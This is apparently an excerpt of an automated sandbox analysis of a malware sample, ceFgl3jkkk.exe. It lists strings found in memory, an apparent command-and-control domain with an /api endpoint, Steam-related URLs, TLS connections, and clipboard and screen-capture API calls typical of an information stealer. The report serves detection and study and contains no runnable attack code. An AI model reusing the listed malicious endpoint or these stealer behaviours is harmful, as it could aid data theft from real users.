    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
    Source: ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
    Source: ceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-details
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstati
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.co
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/im
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=id
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547815675.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
    Source: ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001342000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001342000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api)
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apis
    Source: python39.dll.0.dr String found in binary or memory: https://python.org/dev/peps/pep-0263/
    Source: ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
    Source: ceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mandiant.com/resources/blog/tracking-malware-import-hashing
    Source: ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548099724.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ntcore.com/files/richsign.htm
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr String found in binary or memory: https://www.openssl.org/H
    Source: ceFgl3jkkk.exe, 00000000.00000003.1503202450.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548042408.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
    Source: ceFgl3jkkk.exe, 00000002.00000003.1506886633.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1506725417.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547469415.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49765 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49776 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004348D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004348D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00435785 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F5D1B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F592A0
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F58A40
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F5D3E5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F6BBE8
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F56C00
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F6FD6C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F576B4
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F7169D
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F6FE8C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 0_2_00F6B750
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F5D1B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F592A0
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F58A40
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F5D3E5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F6BBE8
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F56C00
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F6FD6C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F576B4
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F7169D
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F6FE8C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: 2_2_00F6B750
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00411210
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040D330
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040F882
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00439E03
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042F04C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004240E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00439090
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042A14F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040C150
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0043E100
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040F1A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040B1B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00409270
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004292C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004012D5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004392F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00442350
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0043A300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00441322
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00401328
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042F339
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004263EF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00405470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004124A9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004074B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00421500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040A5D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040B640
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004226F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00430698
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0043A6B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0041F860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00428807
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0041683E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004038E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00408890
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042B8A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00444930
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042C9C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_004379F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042AA65
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042FA6E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00426A12
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00441A90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00427B13
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040AB20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042EBC1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0041DBCE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00432BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00420C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00430C1E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042CC8A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00426D48
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00425D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00426D60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040CDD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00422D80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00421D90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00433D95
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0040DE20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00432E30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00407EF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042AE82
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00441E90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00429F40
